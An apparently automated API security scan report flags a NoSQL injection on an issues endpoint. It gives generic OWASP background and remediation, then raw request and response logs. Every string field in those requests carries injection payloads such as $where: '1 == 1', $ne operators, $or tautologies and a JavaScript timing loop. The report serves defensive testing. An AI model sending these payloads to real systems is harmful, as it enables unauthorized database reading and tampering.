Title: NoSQL_Injection Vulnerability on POST:/api/v1/issues/ui
Project: Sanity 7th July
Description: The SQL Injection exploit allows an attacker to read/modify database records via API endpoint calls.
Assertion
Name: NoSQL Injection ( 1 )
Overview: SQL Injection is an Attack. It is executed by insertion or “Injection” of either partial or complete SQL query via query parameters, request body parameters, path parameters and passed to the application server/database.
NoSQL databases are vulnerable to similar attacks like that of SQL. API endpoints allow much bigger surface area then exposed by the web/mobile forms, resulting in performing much deeper and comprehensive attacks by injecting across all resource properties, query-params, path-params, & headers.
Injection flaws, such as SQL, NoSQL, Command Injection, etc. occur when untrusted data is sent to an interpreter as part of a command or query. The attacker's malicious data can trick the interpreter into executing unintended commands or accessing data without proper authorization.
Severity: SQL Injection is classified under the category of “Injection Attacks” by OWASP. “Injection Attacks” is consistently rated at Top 1 Category of Attack by OWASP in years 2010, 2013 and 2017 ( 2 ). SQL Injection is rated top 1 in the CWE / SANS Top 25 ( 3 ) ( 4 ).
Vulnerability Impact: A Successful SQL Injection attack
Can read sensitive data from the database
Can modify the database data thru Insert / Update / Delete statements
Can execute administrative operations on the database
Can recover the content of the given file existing on the database
Can write files into the file system
Can issue commands to the operating System
Exploitation: A successful SQL Injection attack is possible when the attacker crafts a syntactically Correct SQL Query. If an error is thrown back by the API by incorrect query, it will become much easier for the attacker to reconstruct the logic of the original query. If error is hidden, the attacker may have to reverse engineer for an exploitation. It might happen because of the following
User supplied data is NOT validated, filtered or sanitized by the application
Dynamic queries or non-parameterized calls without context-aware escaping
Remediation: A successful SQL Injection attack may possibly be avoided by Secure Coding Practices as outlined by OWASP SQL injection Prevention Cheat Sheet ( 5 ). The following are some of the techniques for remediating SQL Injection attacks.
Title: NoSQL_Injection Vulnerability on POST:/api/v1/issues/ui Project: Sanity 7th July Description: The SQL Injection exploit allows an attacker to read/modify database records via API endpoint calls.
Assertion Name: NoSQL Injection ( 1 )
Overview: SQL Injection is an Attack. It is executed by insertion or “Injection” of either partial or complete SQL query via query parameters, request body parameters, path parameters and passed to the application server/database.
NoSQL databases are vulnerable to similar attacks like that of SQL. API endpoints allow much bigger surface area then exposed by the web/mobile forms, resulting in performing much deeper and comprehensive attacks by injecting across all resource properties, query-params, path-params, & headers.
Injection flaws, such as SQL, NoSQL, Command Injection, etc. occur when untrusted data is sent to an interpreter as part of a command or query. The attacker's malicious data can trick the interpreter into executing unintended commands or accessing data without proper authorization.
Severity: SQL Injection is classified under the category of “Injection Attacks” by OWASP. “Injection Attacks” is consistently rated at Top 1 Category of Attack by OWASP in years 2010, 2013 and 2017 ( 2 ). SQL Injection is rated top 1 in the CWE / SANS Top 25 ( 3 ) ( 4 ).
Vulnerability Impact: A Successful SQL Injection attack
- Can read sensitive data from the database
- Can modify the database data thru Insert / Update / Delete statements
- Can execute administrative operations on the database
- Can recover the content of the given file existing on the database
- Can write files into the file system
- Can issue commands to the operating System
Exploitation: A successful SQL Injection attack is possible when the attacker crafts a syntactically Correct SQL Query. If an error is thrown back by the API by incorrect query, it will become much easier for the attacker to reconstruct the logic of the original query. If error is hidden, the attacker may have to reverse engineer for an exploitation. It might happen because of the following- User supplied data is NOT validated, filtered or sanitized by the application
- Dynamic queries or non-parameterized calls without context-aware escaping
Remediation: A successful SQL Injection attack may possibly be avoided by Secure Coding Practices as outlined by OWASP SQL injection Prevention Cheat Sheet ( 5 ). The following are some of the techniques for remediating SQL Injection attacks.- Use of Prepared Statements
- Use of Stored Procedures
- White list input validation
- Escaping all user supplied input
- Enforcing Least Privilege
References:Risk: NoSQL_Injection Severity: Critical API Endpoint: http://95.217.118.53:8080/api/v1/issues/ui Environment: Master Playbook: ApiV1IssuesUiPostBodyParamNoSqlInjectionTimebound Researcher: [apisec Bot]
QUICK TIPS
Suggestion: Avoid dynamic queries or use gateways/filters. Effort Estimate: 3.0 Hrs Wire Logs: 00:43:11 [D] [AVIUPBPNSITimebound] : Endpoint [http://95.217.118.53:8080/api/v1/issues/ui] 00:43:11 [D] [AVIUPBPNSITimebound] : Method [POST] 00:43:11 [D] [AVIUPBPNSITimebound] : Authorization [Default] 00:43:11 [D] [AVIUPBPNSITimebound] : Request headers [[Accept:"application/json", Content-Type:"application/json", Authorization=[**]}] 00:43:11 [D] [AVIUPBPNSITimebound] : Request [{ "assertions" : "1, $where: '1 == 1'", "assignedTo" : "1, $where: '1 == 1'", "createdBy" : "", "createdDate" : "", "description" : "1, $where: '1 == 1'", "endpoint" : "1, $where: '1 == 1'", "env" : "1, $where: '1 == 1'", "failedAssertions" : "1, $where: '1 == 1'", "headers" : [ "mHE9dYLJ" ], "id" : "", "inactive" : false, "issueName" : "1, $where: '1 == 1'", "issueStatus" : "OPEN", "issueType" : "MANUAL", "method" : "HEAD", "modifiedBy" : "", "modifiedDate" : "", "project" : { "createdBy" : "", "createdDate" : "", "description" : "1, $where: '1 == 1'", "id" : "", "inactive" : false, "modifiedBy" : "", "modifiedDate" : "", "name" : "1, $where: '1 == 1'", "org" : { "createdBy" : "", "createdDate" : "", "id" : "", "inactive" : false, "modifiedBy" : "", "modifiedDate" : "", "name" : "1, $where: '1 == 1'", "version" : "" }, "refId" : "1, $where: '1 == 1'", "version" : "" }, "requestBody" : "1, $where: '1 == 1'", "responseBody" : "1, $where: '1 == 1'", "responseHeaders" : "1, $where: '1 == 1'", "result" : "1, $where: '1 == 1'", "statusCode" : "1, $where: '1 == 1'", "tags" : [ "mHE9dYLJ" ], "version" : "" }] 00:43:11 [D] [AVIUPBPNSITimebound] : Status code [200] 00:43:11 [D] [AVIUPBPNSITimebound] : Response headers [[X-Content-Type-Options:"nosniff", X-XSS-Protection:"1; mode=block", Cache-Control:"no-cache, no-store, max-age=0, must-revalidate", Pragma:"no-cache", Expires:"0", X-Frame-Options:"DENY", Set-Cookie:"SESSION=YTQ0OGZhOGMtOGNmMy00NWM2LWJjZGUtN2FiNjliOTczNTRm; Path=/; HttpOnly", Content-Type:"application/json;charset=UTF-8", Transfer-Encoding:"chunked", Date:"Thu, 05 Aug 2021 00:43:10 GMT"]] 00:43:11 [D] [AVIUPBPNSITimebound] : Response [{ "requestId" : "None", "requestTime" : "2021-08-05T00:43:11.264+0000", "errors" : true, "messages" : [ { "type" : "ERROR", "key" : null, "value" : "Invalid request for project" } ], "data" : null, "totalPages" : 0, "totalElements" : 0 }] 00:43:11 [D] [AVIUPBPNSITimebound] : Response time [587] 00:43:11 [D] [AVIUPBPNSITimebound] : Response size [203] 00:43:11 [I] [AVIUPBPNSITimebound] : Assertion [@ResponseTime < 7000 OR @ResponseTime > 10000] resolved-to [587 < 7000 OR 587 > 10000] result [Passed] 00:43:11 [I] [AVIUPBPNSITimebound] : Assertion [@StatusCode != 404] resolved-to [200 != 404] result [Passed] 00:43:13 [D] [AVIUPBPNSITimebound] : Endpoint [http://95.217.118.53:8080/api/v1/issues/ui] 00:43:13 [D] [AVIUPBPNSITimebound] : Method [POST] 00:43:13 [D] [AVIUPBPNSITimebound] : Authorization [Default] 00:43:13 [D] [AVIUPBPNSITimebound] : Request headers [[Accept:"application/json", Content-Type:"application/json", Authorization=[**]}] 00:43:13 [D] [AVIUPBPNSITimebound] : Request [{ "assertions" : ", $where: "(function(){var date = new Date(); do{curDate = new Date();}while(curDate-date<3000); return true;})()"", "assignedTo" : ", $where: "(function(){var date = new Date(); do{curDate = new Date();}while(curDate-date<3000); return true;})()"", "createdBy" : "", "createdDate" : "", "description" : ", $where: "(function(){var date = new Date(); do{curDate = new Date();}while(curDate-date<3000); return true;})()"", "endpoint" : ", $where: "(function(){var date = new Date(); do{curDate = new Date();}while(curDate-date<3000); return true;})()"", "env" : ", $where: "(function(){var date = new Date(); do{curDate = new Date();}while(curDate-date<3000); return true;})()"", "failedAssertions" : ", $where: "(function(){var date = new Date(); do{curDate = new Date();}while(curDate-date<3000); return true;})()"", "headers" : [ "lDvYXgaJ" ], "id" : "", "inactive" : false, "issueName" : ", $where: "(function(){var date = new Date(); do{curDate = new Date();}while(curDate-date<3000); return true;})()"", "issueStatus" : "OPEN", "issueType" : "MANUAL", "method" : "HEAD", "modifiedBy" : "", "modifiedDate" : "", "project" : { "createdBy" : "", "createdDate" : "", "description" : ", $where: "(function(){var date = new Date(); do{curDate = new Date();}while(curDate-date<3000); return true;})()"", "id" : "", "inactive" : false, "modifiedBy" : "", "modifiedDate" : "", "name" : ", $where: "(function(){var date = new Date(); do{curDate = new Date();}while(curDate-date<3000); return true;})()"", "org" : { "createdBy" : "", "createdDate" : "", "id" : "", "inactive" : false, "modifiedBy" : "", "modifiedDate" : "", "name" : ", $where: "(function(){var date = new Date(); do{curDate = new Date();}while(curDate-date<3000); return true;})()"", "version" : "" }, "refId" : ", $where: "(function(){var date = new Date(); do{curDate = new Date();}while(curDate-date<3000); return true;})()"", "version" : "" }, "requestBody" : ", $where: "(function(){var date = new Date(); do{curDate = new Date();}while(curDate-date<3000); return true;})()"", "responseBody" : ", $where: "(function(){var date = new Date(); do{curDate = new Date();}while(curDate-date<3000); return true;})()"", "responseHeaders" : ", $where: "(function(){var date = new Date(); do{curDate = new Date();}while(curDate-date<3000); return true;})()"", "result" : ", $where: "(function(){var date = new Date(); do{curDate = new Date();}while(curDate-date<3000); return true;})()"", "statusCode" : ", $where: "(function(){var date = new Date(); do{curDate = new Date();}while(curDate-date<3000); return true;})()"", "tags" : [ "lDvYXgaJ" ], "version" : "" }] 00:43:13 [D] [AVIUPBPNSITimebound] : Status code [400] 00:43:13 [D] [AVIUPBPNSITimebound] : Response headers [[X-Content-Type-Options:"nosniff", X-XSS-Protection:"1; mode=block", Cache-Control:"no-cache, no-store, max-age=0, must-revalidate", Pragma:"no-cache", Expires:"0", X-Frame-Options:"DENY", Set-Cookie:"SESSION=NDlkNGQyN2YtOWE5OC00ZjcyLWJiNWItNDBhY2QwNDg5ODQ1; Path=/; HttpOnly", Content-Type:"application/json;charset=UTF-8", Transfer-Encoding:"chunked", Date:"Thu, 05 Aug 2021 00:43:12 GMT", Connection:"close"]] 00:43:13 [D] [AVIUPBPNSITimebound] : Response [{ "timestamp" : "2021-08-05T00:43:13.056+0000", "status" : 400, "error" : "Bad Request", "message" : "JSON parse error: Unexpected character ('(' (code 40)): was expecting comma to separate Object entries; nested exception is com.fasterxml.jackson.core.JsonParseException: Unexpected character ('(' (code 40)): was expecting comma to separate Object entries\n at [Source: (PushbackInputStream); line: 2, column: 31]", "path" : "/api/v1/issues/ui" }] 00:43:13 [D] [AVIUPBPNSITimebound] : Response time [1780] 00:43:13 [D] [AVIUPBPNSITimebound] : Response size [432] 00:43:13 [I] [AVIUPBPNSITimebound] : Assertion [@ResponseTime < 7000 OR @ResponseTime > 10000] resolved-to [1780 < 7000 OR 1780 > 10000] result [Passed] 00:43:13 [I] [AVIUPBPNSITimebound] : Assertion [@StatusCode != 404] resolved-to [400 != 404] result [Passed] 00:43:13 [D] [AVIUPBPNSITimebound] : Endpoint [http://95.217.118.53:8080/api/v1/issues/ui] 00:43:13 [D] [AVIUPBPNSITimebound] : Method [POST] 00:43:13 [D] [AVIUPBPNSITimebound] : Authorization [Default] 00:43:13 [D] [AVIUPBPNSITimebound] : Request headers [[Accept:"application/json", Content-Type:"application/json", Authorization=[**]}] 00:43:13 [D] [AVIUPBPNSITimebound] : Request [{ "assertions" : "[$ne]=1", "assignedTo" : "[$ne]=1", "createdBy" : "", "createdDate" : "", "description" : "[$ne]=1", "endpoint" : "[$ne]=1", "env" : "[$ne]=1", "failedAssertions" : "[$ne]=1", "headers" : [ "6cLZv2vq" ], "id" : "", "inactive" : false, "issueName" : "[$ne]=1", "issueStatus" : "OPEN", "issueType" : "MANUAL", "method" : "HEAD", "modifiedBy" : "", "modifiedDate" : "", "project" : { "createdBy" : "", "createdDate" : "", "description" : "[$ne]=1", "id" : "", "inactive" : false, "modifiedBy" : "", "modifiedDate" : "", "name" : "[$ne]=1", "org" : { "createdBy" : "", "createdDate" : "", "id" : "", "inactive" : false, "modifiedBy" : "", "modifiedDate" : "", "name" : "[$ne]=1", "version" : "" }, "refId" : "[$ne]=1", "version" : "" }, "requestBody" : "[$ne]=1", "responseBody" : "[$ne]=1", "responseHeaders" : "[$ne]=1", "result" : "[$ne]=1", "statusCode" : "[$ne]=1", "tags" : [ "6cLZv2vq" ], "version" : "" }] 00:43:13 [D] [AVIUPBPNSITimebound] : Status code [200] 00:43:13 [D] [AVIUPBPNSITimebound] : Response headers [[X-Content-Type-Options:"nosniff", X-XSS-Protection:"1; mode=block", Cache-Control:"no-cache, no-store, max-age=0, must-revalidate", Pragma:"no-cache", Expires:"0", X-Frame-Options:"DENY", Set-Cookie:"SESSION=NGUyN2VjZTYtZmNkNS00YmEzLWJkOTUtMDkyZTYyNGM1YmQ5; Path=/; HttpOnly", Content-Type:"application/json;charset=UTF-8", Transfer-Encoding:"chunked", Date:"Thu, 05 Aug 2021 00:43:12 GMT"]] 00:43:13 [D] [AVIUPBPNSITimebound] : Response [{ "requestId" : "None", "requestTime" : "2021-08-05T00:43:13.837+0000", "errors" : true, "messages" : [ { "type" : "ERROR", "key" : null, "value" : "Invalid request for project" } ], "data" : null, "totalPages" : 0, "totalElements" : 0 }] 00:43:13 [D] [AVIUPBPNSITimebound] : Response time [785] 00:43:13 [D] [AVIUPBPNSITimebound] : Response size [203] 00:43:13 [I] [AVIUPBPNSITimebound] : Assertion [@ResponseTime < 7000 OR @ResponseTime > 10000] resolved-to [785 < 7000 OR 785 > 10000] result [Passed] 00:43:13 [I] [AVIUPBPNSITimebound] : Assertion [@StatusCode != 404] resolved-to [200 != 404] result [Passed] 00:43:20 [D] [AVIUPBPNSITimebound] : Endpoint [http://95.217.118.53:8080/api/v1/issues/ui] 00:43:20 [D] [AVIUPBPNSITimebound] : Method [POST] 00:43:20 [D] [AVIUPBPNSITimebound] : Authorization [Default] 00:43:20 [D] [AVIUPBPNSITimebound] : Request headers [[Accept:"application/json", Content-Type:"application/json", Authorization=[**]}] 00:43:20 [D] [AVIUPBPNSITimebound] : Request [{ "assertions" : "', $or: [ {}, { 'a':'a", "assignedTo" : "', $or: [ {}, { 'a':'a", "createdBy" : "", "createdDate" : "", "description" : "', $or: [ {}, { 'a':'a", "endpoint" : "', $or: [ {}, { 'a':'a", "env" : "', $or: [ {}, { 'a':'a", "failedAssertions" : "', $or: [ {}, { 'a':'a", "headers" : [ "nXuDmWu3" ], "id" : "", "inactive" : false, "issueName" : "', $or: [ {}, { 'a':'a", "issueStatus" : "OPEN", "issueType" : "MANUAL", "method" : "HEAD", "modifiedBy" : "", "modifiedDate" : "", "project" : { "createdBy" : "", "createdDate" : "", "description" : "', $or: [ {}, { 'a':'a", "id" : "", "inactive" : false, "modifiedBy" : "", "modifiedDate" : "", "name" : "', $or: [ {}, { 'a':'a", "org" : { "createdBy" : "", "createdDate" : "", "id" : "", "inactive" : false, "modifiedBy" : "", "modifiedDate" : "", "name" : "', $or: [ {}, { 'a':'a", "version" : "" }, "refId" : "', $or: [ {}, { 'a':'a", "version" : "" }, "requestBody" : "', $or: [ {}, { 'a':'a", "responseBody" : "', $or: [ {}, { 'a':'a", "responseHeaders" : "', $or: [ {}, { 'a':'a", "result" : "', $or: [ {}, { 'a':'a", "statusCode" : "', $or: [ {}, { 'a':'a", "tags" : [ "nXuDmWu3" ], "version" : "" }] 00:43:20 [D] [AVIUPBPNSITimebound] : Status code [200] 00:43:20 [D] [AVIUPBPNSITimebound] : Response headers [[X-Content-Type-Options:"nosniff", X-XSS-Protection:"1; mode=block", Cache-Control:"no-cache, no-store, max-age=0, must-revalidate", Pragma:"no-cache", Expires:"0", X-Frame-Options:"DENY", Set-Cookie:"SESSION=YzJjZDFhZTEtYTA2ZC00NzU4LWI1NzMtNmE5NmM3Njk4MmE3; Path=/; HttpOnly", Content-Type:"application/json;charset=UTF-8", Transfer-Encoding:"chunked", Date:"Thu, 05 Aug 2021 00:43:20 GMT"]] 00:43:20 [D] [AVIUPBPNSITimebound] : Response [{ "requestId" : "None", "requestTime" : "2021-08-05T00:43:20.892+0000", "errors" : true, "messages" : [ { "type" : "ERROR", "key" : null, "value" : "Invalid request for project" } ], "data" : null, "totalPages" : 0, "totalElements" : 0 }] 00:43:20 [D] [AVIUPBPNSITimebound] : Response time [7051] 00:43:20 [D] [AVIUPBPNSITimebound] : Response size [203] 00:43:20 [E] [AVIUPBPNSITimebound] : Assertion [@ResponseTime < 7000 OR @ResponseTime > 10000] resolved-to [7051 < 7000 OR 7051 > 10000] result [Failed] 00:43:20 [I] [AVIUPBPNSITimebound] : Assertion [@StatusCode != 404] resolved-to [200 != 404] result [Passed] 00:43:21 [D] [AVIUPBPNSITimebound] : Endpoint [http://95.217.118.53:8080/api/v1/issues/ui] 00:43:21 [D] [AVIUPBPNSITimebound] : Method [POST] 00:43:21 [D] [AVIUPBPNSITimebound] : Authorization [Default] 00:43:21 [D] [AVIUPBPNSITimebound] : Request headers [[Accept:"application/json", Content-Type:"application/json", Authorization=[**]}] 00:43:21 [D] [AVIUPBPNSITimebound] : Request [{ "assertions" : ", $where: '1 == 1'", "assignedTo" : ", $where: '1 == 1'", "createdBy" : "", "createdDate" : "", "description" : ", $where: '1 == 1'", "endpoint" : ", $where: '1 == 1'", "env" : ", $where: '1 == 1'", "failedAssertions" : ", $where: '1 == 1'", "headers" : [ "ypFskP0D" ], "id" : "", "inactive" : false, "issueName" : ", $where: '1 == 1'", "issueStatus" : "OPEN", "issueType" : "MANUAL", "method" : "HEAD", "modifiedBy" : "", "modifiedDate" : "", "project" : { "createdBy" : "", "createdDate" : "", "description" : ", $where: '1 == 1'", "id" : "", "inactive" : false, "modifiedBy" : "", "modifiedDate" : "", "name" : ", $where: '1 == 1'", "org" : { "createdBy" : "", "createdDate" : "", "id" : "", "inactive" : false, "modifiedBy" : "", "modifiedDate" : "", "name" : ", $where: '1 == 1'", "version" : "" }, "refId" : ", $where: '1 == 1'", "version" : "" }, "requestBody" : ", $where: '1 == 1'", "responseBody" : ", $where: '1 == 1'", "responseHeaders" : ", $where: '1 == 1'", "result" : ", $where: '1 == 1'", "statusCode" : ", $where: '1 == 1'", "tags" : [ "ypFskP0D" ], "version" : "" }] 00:43:21 [D] [AVIUPBPNSITimebound] : Status code [200] 00:43:21 [D] [AVIUPBPNSITimebound] : Response headers [[X-Content-Type-Options:"nosniff", X-XSS-Protection:"1; mode=block", Cache-Control:"no-cache, no-store, max-age=0, must-revalidate", Pragma:"no-cache", Expires:"0", X-Frame-Options:"DENY", Set-Cookie:"SESSION=MGFlNTkwM2QtMzJkYy00ZjNlLWJiMTMtMDBiMjAwZTUzODFi; Path=/; HttpOnly", Content-Type:"application/json;charset=UTF-8", Transfer-Encoding:"chunked", Date:"Thu, 05 Aug 2021 00:43:20 GMT"]] 00:43:21 [D] [AVIUPBPNSITimebound] : Response [{ "requestId" : "None", "requestTime" : "2021-08-05T00:43:21.476+0000", "errors" : true, "messages" : [ { "type" : "ERROR", "key" : null, "value" : "Invalid request for project" } ], "data" : null, "totalPages" : 0, "totalElements" : 0 }] 00:43:21 [D] [AVIUPBPNSITimebound] : Response time [582] 00:43:21 [D] [AVIUPBPNSITimebound] : Response size [203] 00:43:21 [I] [AVIUPBPNSITimebound] : Assertion [@ResponseTime < 7000 OR @ResponseTime > 10000] resolved-to [582 < 7000 OR 582 > 10000] result [Passed] 00:43:21 [I] [AVIUPBPNSITimebound] : Assertion [@StatusCode != 404] resolved-to [200 != 404] result [Passed] 00:43:22 [D] [AVIUPBPNSITimebound] : Endpoint [http://95.217.118.53:8080/api/v1/issues/ui] 00:43:22 [D] [AVIUPBPNSITimebound] : Method [POST] 00:43:22 [D] [AVIUPBPNSITimebound] : Authorization [Default] 00:43:22 [D] [AVIUPBPNSITimebound] : Request headers [[Accept:"application/json", Content-Type:"application/json", Authorization=[**]}] 00:43:22 [D] [AVIUPBPNSITimebound] : Request [{ "assertions" : "true, $where: '1 == 1'", "assignedTo" : "true, $where: '1 == 1'", "createdBy" : "", "createdDate" : "", "description" : "true, $where: '1 == 1'", "endpoint" : "true, $where: '1 == 1'", "env" : "true, $where: '1 == 1'", "failedAssertions" : "true, $where: '1 == 1'", "headers" : [ "3JIzfKbg" ], "id" : "", "inactive" : false, "issueName" : "true, $where: '1 == 1'", "issueStatus" : "OPEN", "issueType" : "MANUAL", "method" : "HEAD", "modifiedBy" : "", "modifiedDate" : "", "project" : { "createdBy" : "", "createdDate" : "", "description" : "true, $where: '1 == 1'", "id" : "", "inactive" : false, "modifiedBy" : "", "modifiedDate" : "", "name" : "true, $where: '1 == 1'", "org" : { "createdBy" : "", "createdDate" : "", "id" : "", "inactive" : false, "modifiedBy" : "", "modifiedDate" : "", "name" : "true, $where: '1 == 1'", "version" : "" }, "refId" : "true, $where: '1 == 1'", "version" : "" }, "requestBody" : "true, $where: '1 == 1'", "responseBody" : "true, $where: '1 == 1'", "responseHeaders" : "true, $where: '1 == 1'", "result" : "true, $where: '1 == 1'", "statusCode" : "true, $where: '1 == 1'", "tags" : [ "3JIzfKbg" ], "version" : "" }] 00:43:22 [D] [AVIUPBPNSITimebound] : Status code [200] 00:43:22 [D] [AVIUPBPNSITimebound] : Response headers [[X-Content-Type-Options:"nosniff", X-XSS-Protection:"1; mode=block", Cache-Control:"no-cache, no-store, max-age=0, must-revalidate", Pragma:"no-cache", Expires:"0", X-Frame-Options:"DENY", Set-Cookie:"SESSION=MjJkODdiZmYtOTU0OC00ZjU0LTk1NTktN2FjMWY2NmMzMTM2; Path=/; HttpOnly", Content-Type:"application/json;charset=UTF-8", Transfer-Encoding:"chunked", Date:"Thu, 05 Aug 2021 00:43:21 GMT"]] 00:43:22 [D] [AVIUPBPNSITimebound] : Response [{ "requestId" : "None", "requestTime" : "2021-08-05T00:43:22.060+0000", "errors" : true, "messages" : [ { "type" : "ERROR", "key" : null, "value" : "Invalid request for project" } ], "data" : null, "totalPages" : 0, "totalElements" : 0 }] 00:43:22 [D] [AVIUPBPNSITimebound] : Response time [583] 00:43:22 [D] [AVIUPBPNSITimebound] : Response size [203] 00:43:22 [I] [AVIUPBPNSITimebound] : Assertion [@ResponseTime < 7000 OR @ResponseTime > 10000] resolved-to [583 < 7000 OR 583 > 10000] result [Passed] 00:43:22 [I] [AVIUPBPNSITimebound] : Assertion [@StatusCode != 404] resolved-to [200 != 404] result [Passed] 00:43:22 [D] [AVIUPBPNSITimebound] : Endpoint [http://95.217.118.53:8080/api/v1/issues/ui] 00:43:22 [D] [AVIUPBPNSITimebound] : Method [POST] 00:43:22 [D] [AVIUPBPNSITimebound] : Authorization [Default] 00:43:22 [D] [AVIUPBPNSITimebound] : Request headers [[Accept:"application/json", Content-Type:"application/json", Authorization=[**]}] 00:43:22 [D] [AVIUPBPNSITimebound] : Request [{ "assertions" : " { $ne: 1 }", "assignedTo" : " { $ne: 1 }", "createdBy" : "", "createdDate" : "", "description" : " { $ne: 1 }", "endpoint" : " { $ne: 1 }", "env" : " { $ne: 1 }", "failedAssertions" : " { $ne: 1 }", "headers" : [ "Ju4Ssy3c" ], "id" : "", "inactive" : false, "issueName" : " { $ne: 1 }", "issueStatus" : "OPEN", "issueType" : "MANUAL", "method" : "HEAD", "modifiedBy" : "", "modifiedDate" : "", "project" : { "createdBy" : "", "createdDate" : "", "description" : " { $ne: 1 }", "id" : "", "inactive" : false, "modifiedBy" : "", "modifiedDate" : "", "name" : " { $ne: 1 }", "org" : { "createdBy" : "", "createdDate" : "", "id" : "", "inactive" : false, "modifiedBy" : "", "modifiedDate" : "", "name" : " { $ne: 1 }", "version" : "" }, "refId" : " { $ne: 1 }", "version" : "" }, "requestBody" : " { $ne: 1 }", "responseBody" : " { $ne: 1 }", "responseHeaders" : " { $ne: 1 }", "result" : " { $ne: 1 }", "statusCode" : " { $ne: 1 }", "tags" : [ "Ju4Ssy3c" ], "version" : "" }] 00:43:22 [D] [AVIUPBPNSITimebound] : Status code [200] 00:43:22 [D] [AVIUPBPNSITimebound] : Response headers [[X-Content-Type-Options:"nosniff", X-XSS-Protection:"1; mode=block", Cache-Control:"no-cache, no-store, max-age=0, must-revalidate", Pragma:"no-cache", Expires:"0", X-Frame-Options:"DENY", Set-Cookie:"SESSION=NTA4NTVjY2EtZTk0ZS00MTk5LWIyZDktN2E1NTJlY2ExMDMz; Path=/; HttpOnly", Content-Type:"application/json;charset=UTF-8", Transfer-Encoding:"chunked", Date:"Thu, 05 Aug 2021 00:43:21 GMT"]] 00:43:22 [D] [AVIUPBPNSITimebound] : Response [{ "requestId" : "None", "requestTime" : "2021-08-05T00:43:22.646+0000", "errors" : true, "messages" : [ { "type" : "ERROR", "key" : null, "value" : "Invalid request for project" } ], "data" : null, "totalPages" : 0, "totalElements" : 0 }] 00:43:22 [D] [AVIUPBPNSITimebound] : Response time [583] 00:43:22 [D] [AVIUPBPNSITimebound] : Response size [203] 00:43:22 [I] [AVIUPBPNSITimebound] : Assertion [@ResponseTime < 7000 OR @ResponseTime > 10000] resolved-to [583 < 7000 OR 583 > 10000] result [Passed] 00:43:22 [I] [AVIUPBPNSITimebound] : Assertion [@StatusCode != 404] resolved-to [200 != 404] result [Passed] 00:43:23 [D] [AVIUPBPNSITimebound] : Endpoint [http://95.217.118.53:8080/api/v1/issues/ui] 00:43:23 [D] [AVIUPBPNSITimebound] : Method [POST] 00:43:23 [D] [AVIUPBPNSITimebound] : Authorization [Default] 00:43:23 [D] [AVIUPBPNSITimebound] : Request headers [[Accept:"application/json", Content-Type:"application/json", Authorization=[**]}] 00:43:23 [D] [AVIUPBPNSITimebound] : Request [{ "assertions" : "', $where: '1 == 1'", "assignedTo" : "', $where: '1 == 1'", "createdBy" : "", "createdDate" : "", "description" : "', $where: '1 == 1'", "endpoint" : "', $where: '1 == 1'", "env" : "', $where: '1 == 1'", "failedAssertions" : "', $where: '1 == 1'", "headers" : [ "fu4mPhya" ], "id" : "", "inactive" : false, "issueName" : "', $where: '1 == 1'", "issueStatus" : "OPEN", "issueType" : "MANUAL", "method" : "HEAD", "modifiedBy" : "", "modifiedDate" : "", "project" : { "createdBy" : "", "createdDate" : "", "description" : "', $where: '1 == 1'", "id" : "", "inactive" : false, "modifiedBy" : "", "modifiedDate" : "", "name" : "', $where: '1 == 1'", "org" : { "createdBy" : "", "createdDate" : "", "id" : "", "inactive" : false, "modifiedBy" : "", "modifiedDate" : "", "name" : "', $where: '1 == 1'", "version" : "" }, "refId" : "', $where: '1 == 1'", "version" : "" }, "requestBody" : "', $where: '1 == 1'", "responseBody" : "', $where: '1 == 1'", "responseHeaders" : "', $where: '1 == 1'", "result" : "', $where: '1 == 1'", "statusCode" : "', $where: '1 == 1'", "tags" : [ "fu4mPhya" ], "version" : "" }] 00:43:23 [D] [AVIUPBPNSITimebound] : Status code [200] 00:43:23 [D] [AVIUPBPNSITimebound] : Response headers [[X-Content-Type-Options:"nosniff", X-XSS-Protection:"1; mode=block", Cache-Control:"no-cache, no-store, max-age=0, must-revalidate", Pragma:"no-cache", Expires:"0", X-Frame-Options:"DENY", Set-Cookie:"SESSION=NTFhMGFkYWItMjhjZC00OWRlLTk5NDQtZGQ2YjhlMTI3NjE1; Path=/; HttpOnly", Content-Type:"application/json;charset=UTF-8", Transfer-Encoding:"chunked", Date:"Thu, 05 Aug 2021 00:43:22 GMT"]] 00:43:23 [D] [AVIUPBPNSITimebound] : Response [{ "requestId" : "None", "requestTime" : "2021-08-05T00:43:23.234+0000", "errors" : true, "messages" : [ { "type" : "ERROR", "key" : null, "value" : "Invalid request for project" } ], "data" : null, "totalPages" : 0, "totalElements" : 0 }] 00:43:23 [D] [AVIUPBPNSITimebound] : Response time [593] 00:43:23 [D] [AVIUPBPNSITimebound] : Response size [203] 00:43:23 [I] [AVIUPBPNSITimebound] : Assertion [@ResponseTime < 7000 OR @ResponseTime > 10000] resolved-to [593 < 7000 OR 593 > 10000] result [Passed] 00:43:23 [I] [AVIUPBPNSITimebound] : Assertion [@StatusCode != 404] resolved-to [200 != 404] result [Passed] 00:43:23 [D] [AVIUPBPNSITimebound] : Endpoint [http://95.217.118.53:8080/api/v1/issues/ui] 00:43:23 [D] [AVIUPBPNSITimebound] : Method [POST] 00:43:23 [D] [AVIUPBPNSITimebound] : Authorization [Default] 00:43:23 [D] [AVIUPBPNSITimebound] : Request headers [[Accept:"application/json", Content-Type:"application/json", Authorization=[**]}] 00:43:23 [D] [AVIUPBPNSITimebound] : Request [{ "assertions" : "$where: '1 == 1'", "assignedTo" : "$where: '1 == 1'", "createdBy" : "", "createdDate" : "", "description" : "$where: '1 == 1'", "endpoint" : "$where: '1 == 1'", "env" : "$where: '1 == 1'", "failedAssertions" : "$where: '1 == 1'", "headers" : [ "sOB0pMfx" ], "id" : "", "inactive" : false, "issueName" : "$where: '1 == 1'", "issueStatus" : "OPEN", "issueType" : "MANUAL", "method" : "HEAD", "modifiedBy" : "", "modifiedDate" : "", "project" : { "createdBy" : "", "createdDate" : "", "description" : "$where: '1 == 1'", "id" : "", "inactive" : false, "modifiedBy" : "", "modifiedDate" : "", "name" : "$where: '1 == 1'", "org" : { "createdBy" : "", "createdDate" : "", "id" : "", "inactive" : false, "modifiedBy" : "", "modifiedDate" : "", "name" : "$where: '1 == 1'", "version" : "" }, "refId" : "$where: '1 == 1'", "version" : "" }, "requestBody" : "$where: '1 == 1'", "responseBody" : "$where: '1 == 1'", "responseHeaders" : "$where: '1 == 1'", "result" : "$where: '1 == 1'", "statusCode" : "$where: '1 == 1'", "tags" : [ "sOB0pMfx" ], "version" : "" }] 00:43:23 [D] [AVIUPBPNSITimebound] : Status code [200] 00:43:23 [D] [AVIUPBPNSITimebound] : Response headers [[X-Content-Type-Options:"nosniff", X-XSS-Protection:"1; mode=block", Cache-Control:"no-cache, no-store, 